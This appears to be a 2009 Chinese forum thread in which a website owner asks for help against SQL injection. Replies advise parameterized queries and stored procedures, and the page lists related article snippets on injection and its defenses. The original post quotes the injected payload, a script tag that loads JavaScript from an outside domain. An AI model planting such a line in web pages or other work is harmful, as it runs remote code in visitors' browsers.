网站受到sql注入攻击

candty 2009-07-14 10:39:22
网站:www.nlld.net
jsp网站,sql server 2000
注入:<script src=http://99j4.org/0.js></script>

折磨我两周了,在sql语句里已经过滤了单引号,怎么还不行啊
...全文
174 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
ysw830 2009-08-28
  • 打赏
  • 举报
 回复
我也碰到了同样的问题,sql语句全改成参数形式了,还被注入。
帮忙顶!
ansenxl 2009-07-23
  • 打赏
  • 举报
 回复
顶一下,我们只要简单的详细解决方法。。
随风落梦 2009-07-15
  • 打赏
  • 举报
 回复
通过写存储过程来解决!
superzxf 2009-07-15
  • 打赏
  • 举报
 回复
不要通过字符串连接产生sql语句,通过变量传递参数就没问题了
candty 2009-07-14
  • 打赏
  • 举报
 回复
唉,那么复杂有啥用
-狙击手- 2009-07-14
  • 打赏
  • 举报
 回复
删除
-狙击手- 2009-07-14
  • 打赏
  • 举报
 回复
[推荐] SQL注入专题--整理帖

sql注入攻击之sqlmap
手工进行sql注入对于初学者有一定的难度,本节课程针对于信息安全小白讲解怎么使用sqlmap来进行sql注入,结合前面章节将的内容可以的判断互联网上网站是否存在sql注入
网站代码sql注入攻击漏洞修复加固防护措施
这就是如何防御SQL注入攻击,如果您对如何防止SQL注入攻击不是太懂的话,建议找专业的网站安全公司来帮您解决漏洞,国内像SINE安全,鹰盾安全,绿盟,启明星辰,深信服都是比较不错的网络安全公司,来防止网站受到SQL注入攻击。企业网站的运营者应该使用专业的网站漏洞检测软件去检测网站存在哪些SQL注入漏洞,例如像accunetix软件。在大部分的时候,SQL语句都是可以正常运行的。数据库未配置适当的安全性(请为网站以及APP设置特定的数据库权限的账户,而不是使用服务器的账户或管理员账户来运行)。
SQL注入攻击常见方式及测试方法
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入让小伙伴有个了解。适用的人群主要是测试人员,了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,至于如何预防SQL注入,按理说应该是开发该了解的事情~但是作为一个棒棒的测试,搞清楚原理是不是能让我们更加透彻地理解bug的产生原因呢~好啦,话不多说,进入正题~ 如何理解SQL注入攻击)? SQL注入
网站mysql防止sql注入攻击 3种方法总结
mysql数据库一直以来都遭受到sql注入攻击的影响,很多网站,包括目前的PC端以及手机端都在使用php+mysql数据库这种架构,大多数网站受到的攻击都是与sql注入攻击有关,那么mysql数据库如何防止sql注入呢?下面我们SINE安全技术针对于这个sql注入问题总结3种方案去防止sql注入攻击sql注入产生的原因很简单,就是访问用户通过网站前端对网站可以输入参数的地方进行提交参数,...
sql注入攻击的原理(sql注入攻击防范)
SQL 注入(SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。 SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库有 MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产
疑难问题

22,210

社区成员

121,726

社区内容

发帖
与我相关
我的任务
社区描述
MS-SQL Server 疑难问题
社区管理员
  • 疑难问题社区
  • 尘觉
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章